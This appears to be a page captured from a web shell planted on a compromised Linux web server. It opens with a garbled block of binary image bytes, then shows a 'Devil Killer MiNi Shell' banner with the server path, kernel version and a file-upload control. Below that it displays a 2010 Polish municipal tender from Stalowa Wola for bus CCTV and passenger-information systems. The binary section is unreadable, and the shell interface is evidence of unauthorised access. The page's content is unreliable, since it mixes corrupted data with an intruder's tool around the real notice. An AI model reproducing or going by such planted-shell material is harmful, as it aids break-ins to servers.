JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100714/187871-N-2010.html

<p class="kh_header"><b>Stalowa Wola: Dostawa 20 kompletów mobilnego systemu monitoringu wizyjnego z systemem informacji pasażerskiej, jednorodnego wraz z zamontowaniem, uruchomieniem i serwisem eksploatacyjnym dla dwudziestu eksploatowanych przez operatora Zamawiającego  autobusów.</b><br>
<b>Numer ogłoszenia: 187871 - 2010; data zamieszczenia: 14.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stalowa Wola , ul. Wolności 7, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 6433456, faks 015 6433412.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.stalowawola.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa 20 kompletów mobilnego systemu monitoringu wizyjnego z systemem informacji pasażerskiej, jednorodnego wraz z zamontowaniem, uruchomieniem i serwisem eksploatacyjnym dla dwudziestu eksploatowanych przez operatora Zamawiającego  autobusów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest  dostawa 20 kompletów mobilnego systemu monitoringu wizyjnego z systemem informacji pasażerskiej, jednorodnego z zamontowaniem i uruchomieniem wraz z serwisem eksploatacyjnym dla dwudziestu eksploatowanych przez operatora Zamawiającego  autobusów oraz zapewnienie ich kompatybilności z wyposażeniem zamówionym w 2010r wraz z nowo zakupionymi autobusami (Nr sprawy Or.VI.3410-66/10), wyposażeniem do monitoringu i informacji pasażerskiej w autobusie posiadanym przez operatora Zamawiającego (Man A-21, nr boczny 018, nr rej. RST 45NY, rok produkcji 2007) oraz posiadanym oprogramowaniem MUNICOM PREMIUM przez operatora Zamawiającego. Szczegółowy opis techniczny przedmiotu zamówienia stanowi Specyfikacja techniczna zamówienia  - załącznik nr 1.
2.	Przedmiot zamówienia dotyczy modernizacji 20 szt. autobusów w zakresie dostawy, zamontowania i uruchomienia a w części zintegrowania z  istniejącymi w tych autobusach urządzeniami systemu pokładowego, dla osiągnięcia następującej funkcjonalności:
-  zapewnienia monitoringu wnętrza autobusów z wykorzystaniem cyfrowego    mobilnego rejestratora wraz z systemem kamer wewnętrznych i zewnętrznych;
- zapewnienia emisji (wyświetlania) informacji pasażerskiej na wewnętrznym
 monitorze LCD i wewnętrznej tablicy LED; 
- wymiany danych do/z autobusu do istniejącego i eksploatowanego w ZMKS oprogramowania Municom Premium, w zakresie zapewnienia zgodności struktur wymiany danych z urządzeniami pokładowymi i wykorzystaniem posiadanej na zajezdni przez operatora Zamawiającego infrastruktury lokalnego łącza radiomodemowego.
3.  Dostarczone urządzenia muszą w najwyższym możliwym stopniu zapewnić sprawne zarządzanie komunikacją miejską, poprzez zapewnienie odpowiedniej jakości informacji przekazywanych pasażerom oraz przyczynić się do poprawy bezpieczeństwa poprzez rejestrację zdarzeń wewnątrz i na zewnątrz autobusów. 
4. Podstawą ma być sprawne przekazywanie wszelkich niezbędnych dla operatora Zamawiającego danych, ich analiza, obróbka wyników oraz szybkie i czytelne przekazanie każdej ważnej dla społeczeństwa informacji.
5.   Procesy i operacje muszą odbywać się w sposób płynny i automatyczny.
6. Dostarczone urządzenia systemu muszą prawidło współpracować z posiadaną przez Zamawiającego infrastrukturą oraz pozwalać na włączanie dalszych elementów.
7.  Zamawiający użytkuje obecnie oprogramowanie do zarządzania komunikacją   MUNICOM Premium firmy PZI TARAN z Mielca, która posiada prawa autorskie do wdrożonego w tym zakresie rozwiązania:
       a)   w przypadku uzyskania przez Wykonawcę zgody od dostawcy oprogramowania    na jego wykorzystanie do działania w ramach przedmiotu zamówienia oprogramowanie może zostać zaimplementowane na dostarczony sprzęt wraz z bazami danych,
        b)   w przypadku dostarczenia nowego oprogramowania Wykonawca wprowadzi do niego wszelkie niezbędne dane zapewniające jego pełne funkcjonowanie od chwili uruchomienia sytemu zarządzania komunikacją miejską.
8. Modernizowane autobusy (20 szt.) komunikacji miejskiej, ujęte są w  wykazie stanowiącym załącznik nr 7 do SIWZ.
9.  Dostarczony system:
 a )  musi współpracować z wszystkimi urządzeniami znajdującymi się w autobusach bez pogorszenia ich funkcjonalności, zapewniać zbieranie i przetwarzanie dostarczanych przez nie danych,
b)  w przypadku braku możliwości podłączenia istniejących urządzeń do sytemu stanowiącego przedmiot niniejszego zamówienia, Wykonawca musi uwzględnić w ofercie dostawę wraz z montażem na własny koszt nowych urządzeń o parametrach i funkcjonalności nie gorszych od obecnie działających w autobusach oraz zakupionych w ramach przetargu nr sprawy (poda Zamawiający).
10. Zamawiający bezwzględnie wymaga, aby do momentu ostatecznego uruchomienia dostarczonych systemów działały wszystkie zamontowane urządzenia. Wyklucza się sytuację, w której na potrzeby realizacji prac przez Wykonawcę konieczna będzie obsługa linii autobusami bez działających urządzeń lub wystąpi brak obecnej funkcjonalności innych urządzeń (z wyjątkiem wcześniej uzgodnionych), trwałym lub czasowym zatrzymaniem albo ograniczeniem funkcjonalności obecnego systemu (z wyjątkiem uzgodnionych wcześniej sytuacji).
11. Oprogramowanie musi być w całości zainstalowane na dostarczonych przez Wykonawcę komputerach. 
12. Wykonawca może na własny koszt zastąpić obecnie funkcjonujące u Zamawiającego urządzenia innym urządzeniami o nie gorszych parametrach i funkcjonalności. Zaproponowane urządzenia przeznaczone do montażu w autobusach nie mogą mieć większych gabarytów. 
13.   Wszystkie urządzenia w systemie muszą pracować z jednego wzorca czasu. 
14.  Zamawiający wymaga, aby docelowo obsługa Systemu w każdym zakresie była w pełni realizowalna samodzielnie przez operatora Zamawiającego bez konieczności pośrednictwa Wykonawcy lub podmiotów/osób trzecich.
15.  Wykonawca zaproponuje i zapewni system archiwizacji i bezpieczeństwa danych.
16. Zamawiający w ramach przedmiotu zamówienia oczekuje dostawy:
       - urządzeń do 20 autobusów podanych w załącznik nr 7, pozwalających zapewnić funkcjonalność systemu,
        - urządzeń dla dyspozytorni ZMKS wraz z osprzętem, tj. dwóch stanowisk stacjonarnych komputerowych do obsługi wraz z osprzętem, oraz jednego mobilnego stanowiska komputerowego do obsługi wraz z osprzętem, 
dwóch drukarek laserowych (format A4) w tym minimum jedna sztuka posiadająca możliwość druku w kolorze, 
         - oprogramowania wraz z licencjami do realizacji funkcji Systemu,
         - mebli biurowych do dwóch stanowisk komputerowych stacjonarnych,
         - innych niezbędnych elementów do poprawnego działania sytemu i opisanej       funkcjonalności.
17. W przypadku niemożliwości wykorzystania posiadanego przez operatora Zamawiającego urządzeń - Zamawiający dopuszcza zastąpienie ich rozwiązaniem równoważnym z oferty Wykonawcy, bez ponoszenia przez Zamawiającego dodatkowych kosztów wynikających z zastosowania rozwiązania równoważnego.
18. Dostarczone urządzenia muszą być fabrycznie nowe i musza spełniać wymagania określone w specyfikacji technicznej zamówienia będącej załącznikiem do SIWZ. Rok produkcji wyposażenia elektronicznego  nie może być wcześniejszy niż 2010r. 
19. Oferowane wyposażenie dla poszczególnych autobusów powinno być jednorodne w zakresie urządzeń systemu dla monitoringu i urządzeń systemu informacji pasażerskiej oraz zgodne (kompatybilne) z urządzeniami i systemem w nowo zakupionym taborze dla ZMKS Stalowa Wola (8 autobusów, nr sprawy: Or.VI.3410-66/10) jak również z wyposażeniem znajdującym się w autobusie posiadanym przez operatora Zamawiającego (Man A-21, nr boczny 018, nr rej. RST 45NY, rok produkcji 2007) oraz pozwalać na włączenie dalszych elementów.  
20.  W przypadku braku kompatybilności oferowanego wyposażenia z wyposażeniem znajdującym się w autobusie Man A-21, nr boczny 018, nr rej. RST 45NY, rok produkcji 2007, Zamawiający wymaga zamianę wyposażenia w tym autobusie na wyposażenie kompatybilne z  oferowanym dla 20  modernizowanych autobusów w ramach zamówienia bez dodatkowych kosztów dla Zamawiającego. Zdemontowane z tego autobusu wyposażenie niekompatybilne operator Zamawiającego przekaże nieodpłatnie Wykonawcy.
21. Od Wykonawcy/dostawcy wyposażenia elektronicznego Zamawiający wymaga:
-    dostawę 20 kompletów mobilnego systemu monitoringu wizyjnego z       systemem informacji pasażerskie, jednorodnego wraz z zamontowaniem, uruchomieniem i serwisem eksploatacyjnym dla dwudziestu eksploatowanych przez operatora Zamawiającego  autobusów,
-	montażu wyposażenia na zajezdni Zakładu Miejskiej Komunikacji Samochodowej w Stalowej Woli przy ul. Komunalnej 3,
-	 bezpłatnego przeszkolenia dwudziestu pięciu pracowników Zamawiającego/operatora z zakresu obsługi i eksploatacji wyposażenia,
-	zapewnienia serwisu technicznego wyposażenia elektronicznego;
22.	Konstrukcja wyposażenia elektronicznego i zastosowane rozwiązania mają gwarantować co najmniej 10 lat eksploatacji przy założeniu, że autobusy w których  zamontowane zostanie wyposażenie elektroniczne osiągać będą średnio 60.000-70.000 km rocznego przebiegu. Wyposażenie elektroniczne musi być produkowane seryjnie tj. musi być wyprodukowany w co najmniej 100 egzemplarzach w ciągu ostatnich trzech lat w krajach Unii Europejskiej. Zamawiający ma prawo zażądać wykazu dostaw. 
23.	 Na kompletne wyposażenie elektroniczne wymagana jest gwarancja minimum 36 miesięcy licząc od daty protokolarnego przekazania po zamontowaniu do autobusów operatora Zamawiającego. 
24.	Kolorystyka obudowy monitora i wewnętrznej tablicy LED, oraz stelaży do ich zamocowania - do uzgodnienia z operatorem Zamawiającego po podpisaniu umowy. Wszystkie widoczne elementy wyposażenia elektronicznego winny być skomponowane kolorystycznie w sposób gwarantujący wysoką estetykę.
25.	Od Wykonawcy/dostawcy wyposażenia elektronicznego, Zamawiający wymaga dostarczenia w ramach zamówienia:
a)	wszelkich niezbędnych programów oraz interfejsów umożliwiających sprawne wykorzystanie systemu zgodnie z opisaną w SIWZ funkcjonalnością. Wymagana jest minimum licencja na trzy stanowiska w tym na oprogramowanie systemu monitoringu, systemu operacyjnego dla stanowisk komputerowych oraz programu biurowego (opisanego niżej) na trzy stanowiska. 
b)	dwóch komputerów klasy PC dla stanowisk stacjonarnych, minimum w następującej konfiguracji:
- procesor: Intel Core 2 Duo min. 2,40 GHz BOX, 
- obudowa midi tower, zasilacz min. 400W z aktywnym PFC,
- płyta główna wyposażona w interfejsy :min 6 x USB 2.0 w tym dwa na froncie obudowy), 1x serial, 1x paralell, 1xPS/2 (klawiatura), 1xPS/2 (mysz), 1xrj45 (LAN) w technologii 10/100/1000 Mbit/s, posiadająca również sloty rozszerzeń: sloty PCI - 3 szt., sloty PCI-E 16x - 1 szt., sloty PCI-E 1x -3szt., - karta graficzna wyposażona w złącza 1x15 stykowe D-Sub (wyjście na monitor), 1x DVI-I, posiadająca min 512 MB ram, aktywne chłodzenie, złączę magistrali PCI-E 16x.
- pamięć operacyjna ram min 2x2GB 800 MHz cl5,
- dysk twardy min 1 TB SATA II (7200obr/min),
- nagrywarka DVD-RW Super Multi Dual Layer na złączu SATA,
- oprogramowanie: min MS Windows 7 Professional 32bit PL, (licencja + nośnik)
- oprogramowanie biurowe: MS Office Pro-Edition 2007 PL,
- program antywirusowy (licencja na trzy lata),
-  klawiatura i mysz posiadające logo producenta,
- monitor LCD min 21,5/ cala, technologia podświetlania: LED, czas reakcji matrycy 5ms, jasność 250 dc/m2, typ gniazda sygnału wejściowego 15-stykowe D-Sub, DVI-D,
c)	przenośnego (notebook) 1 sztuka minimum w następującej konfiguracji:
-przekątna ekranu lcd 15,6/ cala, 
- klasa procesora min Intel  Core I3 mobile, 
- dysk twardy min 320 GB,
- pamięć operacyjna RAM min 3GB,
- nagrywarka DVD-RW Super Multi Dual Layer,
- MS Windows 7 Professional 32bit PL (licencja + nośnik)
- oprogramowanie biurowe: MS Office Pro-Edition 2007 PL,
- program antywirusowy (licencja na trzy lata)
- torba, mysz
d)	dwóch zasilacz awaryjnych (UPS) w następującej konfiguracji:
-  moc pozorna 800VA,
-  Moc rzeczywista 540 Watt
- min liczba, typ gniazd wyj. z podtrzymaniem zasilania 4x IEC320 C13 (10A),
- Czas podtrzymania dla obciążenia 100% - 5 min.
- Czas podtrzymania dla obciążenia 50% - 17 min.
- Port komunikacji: USB
e)	dwóch urządzeń zabezpieczających (list zasilających) o następującej charakterystyce:
- napięcie normalne urządzenia 230 V 50Hz,
- min. jeden bezpiecznik automatyczny,
- wyłącznik,
- min. pięć gniazd dwubiegunowych ze stykiem ochronnym,
f)	Zamawiający wymaga aby wykonawca/dostawca wyposażenia elektronicznego dostarczył niezbędne oprogramowanie użytkowe wraz z licencją udzieloną na czas nieokreślony, umożliwiające sprawną eksploatacje systemu z bezpłatną aktualizacja na okres co najmniej trzech lat. 
g)	pisemną licencje na przekazane oprogramowania.
Koszt dostarczonego systemu i urządzeń (sprzęt komputerowy, oprogramowanie, licencje) ma być jednorazowy, wkalkulowany w cenę zamówienia.
26.	Wykonawca zobowiązany jest do sprzedaży operatorowi Zamawiającego każdego typu wyposażenia (części zamiennych), wskazanych przez operatora służących do bieżącej eksploatacji urządzeń i utrzymania systemu w sprawności. 

27.	W ramach realizacji zamówienia Wykonawca dostarczy meble biurowe do stanowisk komputerowych: 
a)	Dwa biurka komputerowe:
- wymiary: (szerokość x głębokość x wysokość) [cm] - 140 x 80 x 68-80,blat biurka z płyty wiórowej melaminowanej 25 mm wykończonej obrzeżem grubości 2 mm, posiadającej klasę higieny E ,
- stelaż biurka metalowy z wysuwanymi elementami rurowymi do regulacji wysokości blatu roboczego z możliwością prowadzenia okablowania wewnątrz nogi w pionie,
- regulacja wysokości blatu roboczego w zakresie od 68-80 cm,
- stelaż biurka malowany proszkowo,
- stelaż biurka musi pozwalać na zamocowanie pod biurkiem uchwytu na jednostkę komputerową, 
- biurka muszą być wyposażone w szufladę pod klawiaturę oraz uchwyt na jednostkę komputerową,
-  uchwyt nie może posiadać żadnych ostrych krawędzi mogących ranić nogi, czy niszczyć ubrania,
- biurka muszą być wyposażone w min. trzy szuflady (dopuszcza się rozwiązanie typu /kontener/),
- podstawowym zadaniem uchwytu jest umożliwienie umycia podłogi pod jednostką bez konieczności jej przesuwania.

b)	Dwa krzesła:
- wyposażone w regulację głębokości siedziska oraz regulację pochylenia siedziska (regulacje polecane szczególnie dla osób wysokich),
- podłokietniki o regulowanej wysokości, 
- wyposażone w siłownik gazowy umożliwiający regulację wysokości,
- mechanizm synchroniczny sterujący siedziskiem i oparciem musi działać w sposób pozwalający zachować prawidłową postawę podczas pracy zgodną z zasadami ergonomii pracy,
- synchroniczny mechanizm regulacji kąta ustawienia oparcia i siedziska z możliwością ustawienia w minimum czterech pozycjach, 
- regulacja części lędźwiowej podparcia krzesła,
- możliwość regulacji nacisku w stosunku do ciężaru ciała,
- dostateczną stabilność ma zapewnić pięcioramienny krzyżak aluminiowy malowany proszkowo, wyposażony w rolki do powierzchni twardych, 
- tapicerka trudnopalna, posiadająca wytrzymałość na ścieranie minimum 40 000 cykli, 
- możliwość obrotu wokół własnej osi pionowej o 360°,
- wysokość siedziska: dolne położenie nie wyższa jak 45cm, górne nie mniejsze jak 58 cm. 

c) dwie wolnostojące szafki pod drukarki dopasowane parametrami do dostarczonego sprzętu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2, 30.21.30.00-5, 30.23.21.10-8, 48.51.00.00-6, 48.61.10.00-4, 48.00.00.00-8, 48.81.31.00-1, 39.10.00.00-3, 32.33.31.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie przez Wykonawcę wadium w wysokości   15000 zł (słownie: : piętnaście tysięcy zł) do dnia 17.08.2010 r. do godziny 12:00. Oryginał dokumentu wadialnego należy złożyć oddzielenie. Kopia dokumentu wadialnego winna być załączona do oferty.  Z treści dokumentu wadialnego musi jednoznacznie wynikać, iż gwarant wypłaci kwotę wadium zamawiającemu bezwarunkowo i nieodwołalnie na każde żądanie, w okolicznościach podanych w art. 46 ust. 4a, 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U.z 2007 r. Nr 223, poz. 1655 ze zm.).
Wadium może być wnoszone w jednej lub kilku następujących formach określonych w art. 45 ust. 6 ustawy z dnia 29 stycznia.2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r., Nr 223, poz. 1655 ze. zm.), tj.:
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy         z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:  Nr 47 9430 0006 0000 1111 2000 0007 w Banku Spółdzielczym w Stalowej Woli z dopiskiem /Wadium - Dostawa 20 kompletów mobilnego systemu monitoringu wizyjnego z systemem informacji pasażerskiej, jednorodnego wraz z zamontowaniem, uruchomieniem i serwisem eksploatacyjnym dla dwudziestu eksploatowanych przez operatora Zamawiającego  autobusów/.  Nr postępowania Or. VI. 3410 - 79/10. 
Zamawiający dokonuje zwrotu wniesionego przez wykonawców wadium w trybach i na zasadach określonych w art. 46 ustawy - Prawo Zamówień Publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawcy winni byc uprawnieni do występowania w obrocie prawnym.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykonali w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  3 zadania dla komunikacji zbiorowej, odpowiadające swoim rodzajem tj. mobilnego systemu informacji pasażerskiej i/lub mobilnego systemu monitoringu wizyjnego  i wartością minimum 500.000,00 zł - każde,  co winni potwierdzić dokumentami o ich należytym wykonaniu;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni być ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności   na kwotę ubezpieczenia nie mniejszą niż 200.000,00  zł;
Wykonawcy winni posiadać środki finansowe lub zdolność kredytową w wysokości min. 700.000,00 zł;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

